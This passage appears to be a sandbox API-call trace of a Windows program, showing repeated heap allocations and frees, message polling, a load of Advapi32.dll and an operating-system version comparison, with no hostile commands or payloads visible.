RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0162.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0162.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0162.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0162.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0162.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0162.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0162.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0162.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0162.056] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0162.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0162.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0162.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0162.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0162.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0162.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0162.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0162.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0162.057] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0162.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0162.057] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0162.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0162.057] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0162.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0162.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0162.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0162.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1708 [0162.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0162.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0162.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0162.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0162.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0162.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0162.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0162.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0162.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0162.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0162.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0162.058] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0162.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0162.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0162.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0162.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0162.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0162.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0162.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0162.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0162.059] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0162.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0162.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0162.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0162.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0162.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0162.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0162.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0162.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0162.059] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0162.059] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0162.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0162.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0162.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0162.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0162.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0162.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0162.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0162.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0162.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0162.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0162.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0162.060] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0162.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0162.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0162.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0162.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0162.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0162.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0162.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0162.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0162.060] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0162.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0162.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0162.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0162.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0162.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0162.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0162.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0162.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0162.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0162.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0162.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0162.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0162.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0162.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0162.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0162.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0162.061] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0162.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0162.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0162.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0162.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0162.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0162.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0162.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0162.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0162.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0162.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0162.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0162.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0162.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0162.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0162.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0162.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0162.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0162.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0162.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0162.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0162.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0162.062] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0162.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0162.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0162.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0162.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0162.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0162.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416270 [0162.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0162.063] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0162.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0162.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0162.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa448 [0162.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0162.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0162.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0162.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0162.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0162.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0162.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0162.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0162.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0162.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0162.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0162.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0162.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0162.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0162.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0162.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0162.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0162.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0162.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0162.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0162.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0162.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0162.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0162.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0162.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0162.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0162.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0162.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0162.064] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0162.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0162.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0162.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0162.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0162.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0162.065] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0162.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0162.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0162.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa950 [0162.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0162.065] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0162.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0162.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0162.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0162.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0162.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0162.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0162.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0162.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0162.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0162.065] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0162.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0162.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0162.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0162.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0162.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0162.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0162.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0162.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0162.066] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0162.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0162.066] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0162.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0162.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0162.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0162.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0162.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0162.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0162.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0162.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0162.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0162.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0162.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0162.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0162.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0162.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0162.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0162.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0162.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0162.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0162.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0162.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0162.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0162.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0162.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0162.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0162.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0162.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0162.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0162.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0162.067] HeapFree (in: 